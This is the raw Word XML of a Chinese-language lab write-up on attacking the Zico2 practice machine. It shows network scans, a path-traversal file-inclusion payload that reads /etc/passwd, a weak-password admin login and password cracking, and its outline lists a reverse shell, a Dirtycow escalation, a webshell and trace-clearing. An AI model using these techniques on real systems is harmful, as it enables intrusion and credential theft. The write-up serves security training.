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D592F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:t>Zico2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54033A5D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1AE2D6E8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B42F3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="47240E63" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48C8F3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7C51FC13" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70405105" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="6E713136" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779E353" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="6A12A09F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.查看测试机的IP信息，判断所处网段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8D9D0" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="53B8E989" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.主机发现（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E418F7" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="049EA0AA" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>3.端口扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>masscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548640A5" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3D6ADE32" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）</w:t>
      </w:r>
      <w:r>
        <w:t>Web渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DAFF5A" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3782FBB5" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.浏览web网页（80端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF2AB1" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="76159D44" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.尝试利用文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F3928" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="32808C53" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>3.网站指纹信息扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089408FF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3229E4FF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>4.目录扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42D39F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7ABD2B16" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>5.访问/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AF143" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7876845B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>6.查找数据库信息（用户）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C0A246" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7A1E4426" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>7.尝试利用代码注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76295538" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="2AB74972" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>8.获得反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548956E1" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="33D6E5FB" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>9.Dirtycow提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641ABC5" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="30677963" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>10.启用中国菜刀，获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8961F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3A93DDDB" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>11.清除痕迹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2F60C" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4D95FBE1" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>12.另一种</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>提权方式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>（wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DECD88F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C960D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="79556216" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.靶机：Zico2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0DF60" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="45A6499B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.测试机：Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17629016" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3B3E4820" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>3.帮凶机：Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F61CCF0" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460000CF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092BD514" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.查看测试机的IP信息，判断所处网段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A0581" w14:textId="33748298" w:rsidR="00396EC1" w:rsidRDefault="008D41CF" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C2CE06" wp14:editId="276676A0">
            <wp:extent cx="5195925" cy="2833708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5925" cy="28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0A45" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.主机发现（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0BBD3" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="289287CA" w14:textId="48E4224B" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netdiscover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eth0 -r 192.168.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730485D6" w14:textId="37645E18" w:rsidR="008D41CF" w:rsidRDefault="008D41CF" w:rsidP="00396EC1">
      <w:r w:rsidRPr="008D41CF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207A92A4" wp14:editId="2D89EE5F">
            <wp:extent cx="5274310" cy="18472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06B5" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1CBE1BAF" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>3.端口扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>masscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438B874" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4F09169A" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>masscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --rate=10000 --ports 0-65535 192.168.10.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4F155" w14:textId="5C86E3D9" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="008D41CF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap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-T4 -p 111,80,52448,22 192.168.10.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEA3BE7" w14:textId="77777777" w:rsidR="008D41CF" w:rsidRDefault="008D41CF" w:rsidP="008D41CF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9B061E" w14:textId="62109600" w:rsidR="00396EC1" w:rsidRDefault="008D41CF" w:rsidP="00396EC1">
      <w:r w:rsidRPr="008D41CF">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6300BF" wp14:editId="3859CDAF">
            <wp:extent cx="5239385" cy="2719346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298" cy="27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779C" w14:textId="11753F35" w:rsidR="0032115D" w:rsidRDefault="0032115D" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032115D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A068E06" wp14:editId="488357BE">
            <wp:extent cx="4895886" cy="21907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AE9A" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    开启了22（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>服务）、80（http服务）、111（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，远程过程调用，将不同服务与对应的端口进行绑定，以便支持机器间的互操作）、37495（status）端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA50D9B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="6907CDF8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）</w:t>
      </w:r>
      <w:r>
        <w:t>Web渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B759B0D" w14:textId="2FB4467C" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>1.浏览web网页（80端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200C25D" w14:textId="7327D4A4" w:rsidR="00EB7EBB" w:rsidRDefault="00EB7EBB" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00EB7EBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5788F59A" wp14:editId="3C430BC8">
            <wp:extent cx="5181638" cy="230030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23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8160" w14:textId="7BD03362" w:rsidR="00EB7EBB" w:rsidRDefault="00EB7EBB" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00EB7EBB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735DF406" wp14:editId="76678117">
            <wp:extent cx="5243551" cy="221934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352" w14:textId="77777777" w:rsidR="00EB7EBB" w:rsidRDefault="00EB7EBB" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CA3A82" w14:textId="2BA994D3" w:rsidR="00396EC1" w:rsidRDefault="00EB7EBB" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00EB7EBB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23BF1F45" wp14:editId="761F71E1">
            <wp:extent cx="5014949" cy="22574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949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5F92" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    发现文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E655C9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="0675A94F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>2.尝试利用文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECF265" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1F1BFD76" w14:textId="65C732E5" w:rsidR="00396EC1" w:rsidRDefault="008523F3" w:rsidP="00396EC1">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00244A40">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.10.151/view.php?page=../../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="660A6D19" w14:textId="77777777" w:rsidR="008523F3" w:rsidRPr="008523F3" w:rsidRDefault="008523F3" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD75995" w14:textId="11283602" w:rsidR="00396EC1" w:rsidRDefault="008523F3" w:rsidP="00396EC1">
      <w:r w:rsidRPr="008523F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EACADF0" wp14:editId="7F590EA3">
            <wp:extent cx="5274310" cy="1056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6811" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>3.网站指纹信息扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F694431" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="0469FAD9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.10.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C911CC" w14:textId="3A0F789D" w:rsidR="00396EC1" w:rsidRDefault="005D07E0" w:rsidP="00396EC1">
      <w:r w:rsidRPr="005D07E0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E92EAB6" wp14:editId="6543337D">
            <wp:extent cx="5267325" cy="1304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BD70" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>4.目录扫描（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBC551F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="171A3B3D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.10.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F56BE" w14:textId="21AC02FF" w:rsidR="00396EC1" w:rsidRDefault="005D07E0" w:rsidP="00396EC1">
      <w:r w:rsidRPr="005D07E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFBB857" wp14:editId="65389878">
            <wp:extent cx="4928870" cy="2723322"/>
            <wp:effectExtent l="0" t="0" r="508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9463" cy="27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B115" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    将扫描出的路径逐个尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B894858" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5CA95061" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>5.访问/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D6F2E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="751F1EA9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>http://192.168.10.151/dbadmin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683D085" w14:textId="24DC64EF" w:rsidR="00396EC1" w:rsidRDefault="005D07E0" w:rsidP="00396EC1">
      <w:r w:rsidRPr="005D07E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D3EA0DB" wp14:editId="4F15347C">
            <wp:extent cx="5274310" cy="1399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C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D07E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3618E75D" wp14:editId="6612B978">
            <wp:extent cx="5274310" cy="1466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C1">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00396EC1">
        <w:lastRenderedPageBreak/>
        <w:t>看到一个登录界面，尝试弱口令（admin），登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E36EB6" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="651B0146" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>6.查找数据库信息（用户）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580CCD5E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7E2F8169" w14:textId="00BA2EBB" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00C921AD">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>查找到账号信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7853153D" w14:textId="5E9A04E4" w:rsidR="00C921AD" w:rsidRDefault="00C921AD" w:rsidP="00C921AD">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C921AD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55BA98E3" wp14:editId="7288122E">
            <wp:extent cx="5100675" cy="1976452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0675" cy="1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996B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1CFE9CE1" w14:textId="0B042FF2" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>破解账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE24BD" w14:textId="187FB529" w:rsidR="002924DF" w:rsidRDefault="002924DF" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002924DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B683E6C" wp14:editId="39A20AA9">
            <wp:extent cx="5274310" cy="1485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AF79" w14:textId="748F367F" w:rsidR="002924DF" w:rsidRDefault="002924DF" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002924DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352A9FE5" wp14:editId="18B71332">
            <wp:extent cx="5274310" cy="1475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2B7" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7F3BF269" w14:textId="49386A12" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>尝试远程登录（失败）</w:t>
      </w:r>
    </w:p>
